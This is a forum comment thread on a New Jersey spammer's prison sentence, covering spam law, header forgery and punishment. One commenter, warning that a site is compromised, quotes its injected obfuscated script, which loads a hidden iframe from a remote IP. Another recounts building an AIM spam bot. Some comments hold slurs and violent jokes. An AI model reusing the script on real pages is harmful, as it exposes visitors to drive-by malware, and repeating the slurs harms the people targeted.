NJ Spammer Gets Two Years Jail for AOL Spam Scam

Tech.Luver writes "A man from New Jersey has been sentenced to more than two years in prison for sending more than a million spam messages to AOL users. 'Todd Moeller was sentenced ... after he was caught making a deal with a government informant to send junk e-mails advertising a computer security program in return for 50 percent of the profits ... Moeller told the informant via instant messaging he could conceal the source of the e-mails through his access to 40 different servers and had profited $40,000 a month from other spam e-mail scams that promoted stocks, prosecutors said.'"

Yeah, right.

[ThePromenader]

"Masking" source IP's. Not on this earth.

Re:Yeah, right.

[burris]

I guess you've never heard of Chaumian mix or a DC-net.

Re:Yeah, right.

[ThePromenader]

Chaum mixing masks the message itself, but the routing information added to its headers as it travels? Correct me if I'm wrong, but where a message has been is still visible in its headers upon its arrival.

Re:Yeah, right.

[Antique+Geekmeister]

Given the prevalence of rootkitted Windows boxes and even servers on which spammers rent and lease time, the routing information doesn't do you that much good. And the routing information is often deliberately cluttered with forged and irrelevant headers, so it's not as useful as you might think.

Usenet had similar issues until the "NNTP-Posting-Host" header was added and became popular some years back, in the midst of a nasty war of forged cancellation messages on a Usenet newsgroup.

AOL

[conureman]

Who would read SPAM?

Re:AOL

[Ethanol-fueled]

Who would use AOL?

Re:AOL

[Smordnys+s'regrepsA]

Stock-SPAM relies on one thing only: name recognition.

It doesn't matter if the user reads the email, clicks on a link, or types in a url. Sure that helps, but...

They only need to glance at the Subject line as they're deciding to trash the message, if the stock's name is the message.

Re:AOL

[Neeth]

AOL users.

Re:AOL

Nine million people. And counting.

(Down, that is...)

Re:Yeah, right. spam spam spam spam and spam.

[Quantum+Jim]

I have heard of Chaumian mix spam spam spam and spam or a spam spam DC-net sausage and spam. Spam. But instead I think I'm having spam spam spam spam spam spam spam beaked beans spam spam spam and spam! Spam Spam Spam Spam... Lovely spam! Wonderful spam! Lovely spam! Wonderful spam!

(Sorry, the title of the article ending with "spam scan" encouraged me. Spam.)

You forget one thing.

[www.sorehands.com]

You forget we are talking about AOL users.

Re:You forget one thing.

[bombastinator]

Serious? Or is that bs?

Re:You forget one thing.

That link is to a trojan, but it seems to be unrelated to the parent post.

-- Different AC.

Re:You forget one thing.

[Kalriath]

I suggest you remove that URL from your signature, the last line (after the end of the HTML tag) of every page of your site is "eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%65%65%64%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%38%31%2e%32%39%2e%32%34%31%2e%37%30%2f%6e%65%77%2f%63%6f%75%6e%74%65%72%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%36%30%37%35%30%29%2b%27%66%61%62%5c%27%20%77%69%64%74%68%3d%37%35%30%20%68%65%69%67%68%74%3d%34%38%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); ".

You've been rooted!

Re:You forget one thing.

[Kalriath]

Well, that eval() line is enclosed in script tags on your site. Slashdot removed the script tags, rather than escaping them.

Significance

[Cillian]

I believe an appropriate quote would be, "You may have won the battle, but we will win the war" - Even taking out a large spammer like this doesn't have a particularly large effect on the overall influx of spam. Maybe we need to go with the ??AA tactics and sue the mom-and-pop spam shops to try and scare the $*&^ out of them?

Re:Significance

[Anne+Thwacks]

Everyone knows "Only cruise misssiles will cure spam"

Re:Significance

Your post advocates a

( ) technical (X) legislative ( ) market-based ( ) vigilante

approach to fighting spam. Your idea will not work. Here is why it won't work. (One or more of the following may apply to your particular idea, and it may have other flaws which used to vary from state to state before a bad federal law was passed.)

( ) Spammers can easily use it to harvest email addresses
( ) Mailing lists and other legitimate email uses would be affected
( ) No one will be able to find the guy or collect the money
(X) It is defenseless against brute force attacks
( ) It will stop spam for two weeks and then we'll be stuck with it
(X) Users of email will not put up with it
( ) Microsoft will not put up with it
(X) The police will not put up with it
( ) Requires too much cooperation from spammers
( ) Requires immediate total cooperation from everybody at once
( ) Many email users cannot afford to lose business or alienate potential employers
( ) Spammers don't care about invalid addresses in their lists
(X) Anyone could anonymously destroy anyone else's career or business

Specifically, your plan fails to account for

( ) Laws expressly prohibiting it
( ) Lack of centrally controlling authority for email
(X) Open relays in foreign countries
( ) Ease of searching tiny alphanumeric address space of all email addresses
( ) Asshats
( ) Jurisdictional problems
( ) Unpopularity of weird new taxes
( ) Public reluctance to accept weird new forms of money
( ) Huge existing software investment in SMTP
( ) Susceptibility of protocols other than SMTP to attack
( ) Willingness of users to install OS patches received by email
( ) Armies of worm riddled broadband-connected Windows boxes
( ) Eternal arms race involved in all filtering approaches
( ) Extreme profitability of spam
( ) Joe jobs and/or identity theft
( ) Technically illiterate politicians
( ) Extreme stupidity on the part of people who do business with spammers
(X) Dishonesty on the part of spammers themselves
( ) Bandwidth costs that are unaffected by client filtering
( ) Outlook

and the following philosophical objections may also apply:

(X) Ideas similar to yours are easy to come up with, yet none have ever
been shown practical
( ) Any scheme based on opt-out is unacceptable
( ) SMTP headers should not be the subject of legislation
( ) Blacklists suck
( ) Whitelists suck
( ) We should be able to talk about Viagra without being censored
( ) Countermeasures should not involve wire fraud or credit card fraud
( ) Countermeasures should not involve sabotage of public networks
( ) Countermeasures must work if phased in gradually
( ) Sending email should be free
( ) Why should we have to trust you and your servers?
( ) Incompatiblity with open source or open source licenses
( ) Feel-good measures do nothing to solve the problem
( ) Temporary/one-time email addresses are cumbersome
( ) I don't want the government reading my email
(X) Killing them that way is not slow and painful enough

Furthermore, this is what I think about you:

( ) Sorry dude, but I don't think it would work.
(X) This is a stupid idea, and you're a stupid person for suggesting it.
( ) Nice try, assh0le! I'm going to find out where you live and burn your
house down!

Re:Significance

[Peet42]

Maybe you Americans can put "Rendition" to good use; it might not have such a bad name if you used it to move convicted SPAMmers to countries where the death penalty could be applied quickly and quietly.

Re:Significance

[Orange+Crush]

Correct me if I'm wrong, but I assumed only a small fraction of spam came from small operations. Isn't the lion's share believed to be coming from the big guys with massive botnets? And I doubt RIAAesque tactics would scare them. Unless the RIAA managed to lobbby for a few cruise missiles to get fired at overseas targets. (I really wouldn't put it past them)

Here's an opportunity

[Paktu]

In some states you could easily get two years for selling pot. Why couldn't we send a clear message to other spammers here by giving this guy a decade or three in a federal pound-me-in-the-ass prison?

He does a hell of a lot more damage to the economy than a drug dealer, anyway.

Re:Here's an opportunity

[Cillian]

However, I would argue a an inbox full of spam can do a lot less damage to an individual than getting mixed up with drugs.

Re:Here's an opportunity

[essence]

However, I would argue a an inbox full of spam can do a lot less damage to an individual than getting mixed up with drugs. How much damage can some of those drugs do that are advertised in the spam?

Cannabis is not particularly harmful, especially when vapourized or eaten instead of smoked.

Re:Here's an opportunity

[rhizome]

Cannabis is not particularly harmful, especially when vapourized or eaten instead of smoked. ...except for the part where it makes you stupid.

Re:Here's an opportunity

[Antique+Geekmeister]

Unfortunately, it would interfere with the "Direct Marketing Association", a lobby that protects junk mail and junk email. They're thoroughly unwilling to allow any law that might interfere with their clients be passed, so the laws against spam are written only to address the most blatant forms of fraud and carefully avoid putting any responsibility on the network providers who provide them services.

So there remains no law against spam itself, anymore than there is a law against junk mail.

Re:Here's an opportunity

[citation required]

Re:Here's an opportunity

[grumbel]

It is *my* choice to use or not use drugs, so the dealer does exactly zero damage unless his drugs are not what the user expects in terms of dose and cleanness. On the other side nobody ever asked me if I want to have my inbox full of spam. Mail as a medium these days is borderline unusable, spam filters lower the damage, but more then a few people have already lost important mail. If I want to make sure that somebody really gets a piece of information, I wouldn't send it per email. Spammers are basically DDoS'ing millions of peoples inboxes and the punishment for that can't be harsh enough.

Re:Here's an opportunity

So it doesn't have any effects on the average US citizen? :p

Re:Here's an opportunity

[Peet42]

I would argue a an inbox full of spam can do a lot less damage to an individual than getting mixed up with drugs.

But a single SPAMmer can damage many, many more individuals than a single drug dealer. Plus he inflicts collateral damage on numerous organisations on the way by crippling their IT infrastructure with his BotNets.

Use "Rendition" to send convicted SPAMmers to China, where they can be speedily executed and their organs sold back to the West for transplant; it's the only logical solution.

Re:Here's an opportunity

[vertinox]

However, I would argue a an inbox full of spam can do a lot less damage to an individual than getting mixed up with drugs.

A person sitting at home smoking pot does not harm me in any way.
A person sitting at home emailing me spam harms my blood pressure.

Re:Here's an opportunity

[budgenator]

True, but after the short prison term, there is parole where in order to get out of prison 6 months early he has to agree to not use a computer until he is off parole, to get off parole he has to go to parole and pay for the privilege, and usually he has to pay restitution and make a considerable donation to a victim's rights fund and generally be treated like a piece of shit by a pompus asshole. Then if he fails to meat the conditions of parole, they can violate him , throw him back in to serve hes sentence and decide not to give him credit for time already served. Personally I'd just do the time myself.

Re:Here's an opportunity

[budgenator]

insufiecent baseline to make a comparison.

Re:Here's an opportunity

[gstoddart]

Unfortunately, it would interfere with the "Direct Marketing Association", a lobby that protects junk mail and junk email. They're thoroughly unwilling to allow any law that might interfere with their clients be passed

And, that, completely summarizes the problem with laws today.

The fact that a lobby group is "unwilling to allow any law that might interfere with their clients be passed" should be irrelavant. It shouldn't be up to them to decide.

Sadly though, I think you're 100% accurate -- lobby groups have far more sway over laws than citizens and lawmakers. And, not just on the topic of spam.

Ideally, they should be able to collectively tell the "Direct Marketing Association" to go pound sand. Personally, I don't see why the people sending junk mail should have any more right to send crap to me than the morons selling me C1Al1s or V:I:A:G:A:R:A or what have you. I don't want you rpaper fliers or your junk e-mail.

Cheers

Re:Here's an opportunity

>insufiecent

Yes, indeed.

Re:Here's an opportunity

[kenwd0elq]

Jerry Pournelle has frequently opined that the spam problem isn't going to abate until a dozen spammers are on TV doing the "perp walk" on CNN, and getting decades-long prison terms for being public nuisances. Either that, or resolve the problem the way the Russian mob does....

Re:Here's an opportunity

[jfengel]

Spam and junk mail are different problems. The DMA likes junk mail, but hates spam, because it makes it harder for their junk emails to get through.

The DMA really wants to enforce the CAN-SPAM rules that make it easy for smart people to filter out the junk but allows it to sail right through to the dumb people who are more willing to buy their stuff.

The problem is the vast number of spammers who AREN'T part of the DMA. That spam is already illegal under the CAN-SPAM act because of the forged headers, lack of opt-out, etc. They piss you off, but they also piss off the DMA, because the spam filters required to recognize the true spam strip out the legal junk emails as well.

The DMA will enforce the rules on its own members because they're afraid of what spam filters do. If the true spam disappears, you would just filter out the legal spam and there just wouldn't be all that much of it.

Sadly, true spam isn't going away any time soon, so the DMA is pretty much stuck. They should spend some of their money pursuing and prosecuting the illegal spammers, which would make both you and them a lot happier.

Re:Here's an opportunity

Jerry Pournelle has frequently opined that the spam problem isn't going to abate until a dozen spammers are on TV doing the "perp walk" on CNN, and getting decades-long prison terms for being public nuisances.

Yeah, that worked wonders for the war on drugs. We now have the highest incarceration rate in the world and drug use is unchanged.

Re:Here's an opportunity

[slashqwerty]

I don't think parole works that way. Conditions of parole will be dealt with on a case-by-case basis. Regardless, if someone violates parole they, at worst, are sent back for the remainder of their term. The term does not start over. In practice if someone violates parole they go back to prison only for part of their remaining time, if at all. Convicts are occasionally ordered to pay restitution but I believe that is unrelated to parole.

Re:Here's an opportunity

[Antique+Geekmeister]

Spam and junk mail are different faces of the same coin. Junk mail is sent because it's a very cheap way to reach a lot of people, and get some business out of it. The margins are low, a lot of it is flat-out fraudulent, but the paper trail makes it traceable to some small extent, so it's somewhat limited.

Spam merely lowers the per-message cost by quite a lot, and lacks the paper trail. But in both cases, they are "unsolicited bulk communications". That's the only definition of spam I've seen that can be easily tested and verified, without getting into complicated issues of free speech or what is and what isn't fraud.

The intermediate is junk fax: notice that that was abused so badly, and was so expensive to the consumer, that it did in fact get outlawed and has witshstood all the constitutional challenges against the ban. I'd love to see that law extended to cover spam: in legal terms, it's a very clear way to extend the same law and the previous constitutional challenges should apply to a decent anti-spam law. But the DMA will never allow it, partly because they're not in this business for the "good of their members". They're in it for the next year's lobby funding.

One down

[linefeed0]

Now if they'll only get the shotpak stock-spam fuckers. I am waiting with bated breath or some other such cliché for the SEC to suspend trading of that damned stock like they did with connect-a-jet.

Re:One down

[Cillian]

Which would then provide an interesting way to sabotage another company - simply spam a pump-and-dump with their stock, near an interesting release and stand back.

IMNSHO

I hope that motherfucker gets ass-raped in prison!

Spam

[clarkkent09]

And how appropriate that the story itself is spam for this techluver blog.

In any case, I wonder why don't they do this kind of sting operations to catch spammers more often. Just the lack of resources or will I guess. If we could somehow link spammers to terrorism I'm sure we'd see this kind of thing a lot more often. Like manufacture a story that Al Qaeda is financed by sales of penis enlargement pills or something?

Re:Spam

[Gibbs-Duhem]

You should email this story to as many people as possible. I think I've heard of some places you can go that'll distribute your message to millions of people for pennies.

Correct

[Per+Abrahamsen]

> However, I would argue a an inbox full of spam can do a lot less damage to an individual than getting mixed up with drugs.

Correct. It can also do more damage, depending on the drug in question, and on the content of the real mail you lost because the inbox was full, or that you accidentally deleted because it drowned in all the spam.

So the fair thing would be to treat the two cases as equally bad per end user. So spamming a million people should be punished like dealing (illegal) drugs to a million people.

[Actually, the drug dealers "victims" generally agree to the transaction, while the spammers victims doesn't, so the two crimes aren't really comparable. ]

YRO Irony

[The_Mystic_For_Real]

The people begging for government intervention on spam need to tread carefully. The government has started with CANSPAM, which everyone knows is futile but might scare a few people off, but where is it going to go. Spam does not have a legal solution, it has a technical one. If you do not expect to receive unsolicited e-mail, drop it, and have your friends do the same. Obviously this is unfeasible for many but once the personal e-mails are secure the money will dry up.

Letting any message into your inbox and complaining when it is full of spam is like leaving a cup outside and complaining when it is full of rain.

Re:YRO Irony

[pipingguy]

I think you should replace the word "rain" with either "urine" or "excrement". Rain is a pleasant, refreshing thing.

Re:YRO Irony

[dodobh]

Spam does not have a legal solution, it has a technical one.

Spoken like someone without a clue. Spam is a social problem, not a technical one.

Re:YRO Irony

[The_Mystic_For_Real]

Yes, because eliminating greed is much easier than whitelists for personal accounts.

Re:YRO Irony

[Phroggy]

Either you have no idea what you're talking about, or you really don't get out much. There is no simple technical solution to the spam problem that doesn't render e-mail useless for communication. If you don't interact with other people, and therefore don't need to use e-mail for communication, then go ahead and stop using it, or set it to drop everything that isn't whitelisted. A lot of people are moving to message boards and social networking sites for this reason (sending messages on MySpace, instead of using e-mail).

But for those of us who actually need to use e-mail, no, whitelisting isn't a solution.

You're also under the false impression that if people stop buying stuff advertised in spam, the spam will stop coming. You're forgetting two things. First is Rule #1: spammers lie. Second is the fact that very often, the person sending out the spam advertising a particular product is NOT the same person who's actually SELLING the product. Spammers will approach a gullible and perhaps shady business, and say "hey, if you pay us $X, we'll promote your business on the Internet, using completely legitimate double-opt-in mailing lists of interested customers!" The company pays the spammer, the spammer sends the spam, the company gets so many complaints that they wind up going out of business, but the spammer has been paid.

If nobody ever bought anything from spam, spammers would still be able to convince gullible people otherwise.

Re:YRO Irony

[The_Mystic_For_Real]

What the fuck how would spammers make money if no one bought their products? And if we take personal e-mails off the market for spammers it will quickly dry up their market.

Re:YRO Irony

You realize that most of these spammers work through affiliate programs, which pay percentages based on what people actually buy, right?

Re:YRO Irony

[The_Mystic_For_Real]

Yes, exactly, if no one is through them they make 0, and the majority of their buyers are not people using e-mail for business. People are unable to think rationally about spam, because it infuriates them, there are simple solutions, they just require people to actually do something.

Re:YRO Irony

[Kalriath]

No, but eliminating stupid motherfuckers who keep clicking on the spam websites might help.

Re:YRO Irony

[dodobh]

Whitelists don't solve the problem of initiating first contact.

Will the revenue from scam be taken away?

[blind+biker]

"confiscated" or whatever is the correct English word. If not, this isn't really going to deterr future (and present) spammers - two years in jail, but after making US $40.000/month... I dunno, some would still risk it.

Re:Will the revenue from scam be taken away?

[hyades1]

I bet he was lying through his teeth about how much he made in order to impress the cop and do the deal. If he thinks two years in jail is bad, wait 'til he has to explain to the IRS that he didn't really make all that money and hide it somewhere untraceable. He'll wish he was back in his cell getting corncobbed by Bubba.

Re:Will the revenue from scam be taken away?

[budgenator]

Yeah buddy, ain't that the truth, two years in prison is just a prepertaion for what the IRS is going to do. We had an IRS CID agent come to the office looking for every check the accountant had ever written, she was seriously scarey and I've worked with FBI, BATF, and DEA. After they add up the back taxes, interest and penalties at $40K per month for 7 years and throw him back in prison for tax evasion he'll be saying "Bubba you were always so good to me, you always smuggled a little butter out of the mess hall to use before you play hide the balonna, those IRS meaners just dry-hump you till you bleed to death ..."

Re:Will the revenue from scam be taken away?

[blind+biker]

Sounds like tax officers are scary everywhere. In Finland, you'll be treated better if you're a murderer, than if you evade taxes.

Re:Will the revenue from scam be taken away?

[Khaed]

Honestly, that sounds about right. There are people in the US who have got more time for tax evasion than child molesters.

What a great message that is. "Rape children and you're okay as long as you pay your taxes!"

Re:Will the revenue from scam be taken away?

[hyades1]

If you'd worked with Dracula, I bet you'd STILL find that woman scary. I got some advice once from a Canadian version of the creature with respect to my father's estate. It amounted to, "You're right, but you might as well give up now. You're not in a financial position to fight a multi-year court battle, and we're prepared to keep going forever".

I can imagine a typical job interview when they're hiring these people:

"I see the Hobbies and Interests part of your resume lists torturing puppies and tipping wheelchairs.

"You got a problem with that?

"Not at all. It means you can skip the orientation session. You start work Monday.

FBI is now spamming ...

after he was caught making a deal with a government informant to send junk e-mails

Thanks FBI for making people send spam!

Spam

[twentynine]

spam spam spam baked beans spam spam

FBI isn't actually spamming

The story is wrong. His deal is actually to help the FBI with phishing. You'll soon start receiving emails with subjects like:

"eTerrorist - ACCOUNT SECURITY ALERT"
"Asssassinationmates - You have new mail waiting!"
"BombMarket.com - ANNUAL ACCOUNT VERIFICATION"

The Spam Demand

[pbot]

Honestly I am not sure about the legal complications involved, but I'd think the companies going to spammers could be held in some way liable. If one were to impose penalties for going out and plastering flyers all over my neighborhood, covering windows and doors and cars - to the point the volume becomes excessive/criminal- I'd think I'd want to just as much go after the business as much as the delivery system.

Re:The Spam Demand

[conureman]

Just doin' what I can, I shun the businesses that practice what I abhor. Kinda blows my mind how stupid a population with an average I.Q. of 100 can be though.

heh

[ClioCJS]

Do your homework, idiot.

His cellmate...

[kcbanner]

...will be happy to find out this is the guy that clogged his inbox all those years.

It is bullshit.

[www.sorehands.com]

There is no trojan on my site. I did go to the link, but since I am running OS/2 on that system, I am not worried.

It was a lot more fun when it wasn't illegal

[not+already+in+use]

Seven or eight years ago I wrote an AOL spammer that connected to an arbitrary number of AIM names using the toc protocol. It was insanely easy back then, the only deterrent was the rate limit imposed on each screen name, which was easily bypassed by the spammer essentially acting as a client for 10 to 12 AIM screen names. Then the spammer would just grab name from all of AOL's adult chatrooms which made for a great click/signup ratio. The best part? It wasn't technically illegal. And I was in highschool, making about $600/month. Not bad.

Re:Yeah, right. spam spam spam spam and spam.

[professional_troll]

You're a silly little jew arn't you?